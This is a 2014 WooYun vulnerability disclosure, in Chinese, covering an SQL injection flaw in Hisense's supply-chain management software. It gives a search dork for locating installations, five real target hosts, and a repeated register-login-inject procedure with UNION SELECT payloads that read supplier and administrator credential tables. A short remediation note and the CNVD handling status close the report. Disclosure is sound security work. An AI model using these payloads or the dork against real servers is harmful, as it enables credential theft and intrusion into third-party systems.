漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-071715
漏洞标题:某商业链系统SQL注入漏洞二
相关厂商:Cncert国家互联网应急中心
漏洞作者: sex is not show
提交时间:2014-08-11 11:41
修复时间:2014-11-09 11:42
公开时间:2014-11-09 11:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-11: 细节已通知厂商并且等待厂商处理中
2014-08-16: 厂商已经确认,细节仅向厂商公开
2014-08-19: 细节向第三方安全合作伙伴开放
2014-10-10: 细节向核心白帽子及相关领域专家公开
2014-10-20: 细节向普通白帽子公开
2014-10-30: 细节向实习白帽子公开
2014-11-09: 细节向公众公开
简要描述:
我看到商业链上首页了,我发可以上首页么?
详细说明:
开发公司:青岛海信智能商用股份有限公司(http://www.hisense.com)
程序名称:供应链管理系统
漏洞类型:SQL注入
漏洞文件:/ScmLy/SelectMessageV.aspx
漏洞参数:tb_LyTimeL
是否需要登录:需要普通用户权限(可以随意注册用户,so...)
关键字:海信供应链管理系统/供应链管理系统. Ver:3.5.5 / inurl:/ScmUser/login.aspx
影响用户:几十家吧
搜集一些用户列表:
利用方法:
实例演示:
1.
①先注册用户
http://124.129.157.189:90//ScmAprov/InstQzVendor.aspx
我注册的tested/tested
②登录
http://124.129.157.189:90/scmsup/Default.aspx
③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--
啦啦啦,直接读出管理员用户数据了、
2.
①先注册用户
http://218.75.63.158:8001//ScmSup/InstVendor.aspx
我注册的tested/tested
②登录
http://218.75.63.158:8001/scmsup/Default.aspx
③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--
啦啦啦,直接读出管理员用户数据了、
3.
①先注册用户
http://122.225.53.6//ScmSup/InstVendor.aspx
我注册的tested/tested
②登录
http://122.225.53.6/scmsup/Default.aspx
③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--
啦啦啦,直接读出管理员用户数据了、
漏洞证明:
4.
①先注册用户
http://119.187.148.69:7171//ScmAprov/InstQzVendor.aspx
我注册的tested/tested
②登录
http://119.187.148.69:7171/scmsup/Default.aspx
③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--
啦啦啦,直接读出管理员用户数据了、
5.
①先注册用户
http://sup.hisense-plaza.com//ScmAprov/InstQzVendor.aspx
我注册的tested/tested
②登录
http://sup.hisense-plaza.com/scmsup/default0.aspx
③查询
两个用户表,看图
2011-01-01' and 1=2 union select 1,LoginID,SupName,Passwd,5,6,7 from tScmSup--
2011-01-01' and 1=2 union select 1,UserName,UserPasswd,4,5,6,7 From tScmUser--
啦啦啦,直接读出管理员用户数据了、
修复方案:
供应商注册加审核
后台查询参数过滤
版权声明:转载请注明来源 sex is not show@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-08-16 08:33
厂商回复:
最新状态:
2014-08-20:补充处置情况:CNVD确认并复现所述情况,已经由CNVD按以往联系渠道邮件向软件生产厂商通报。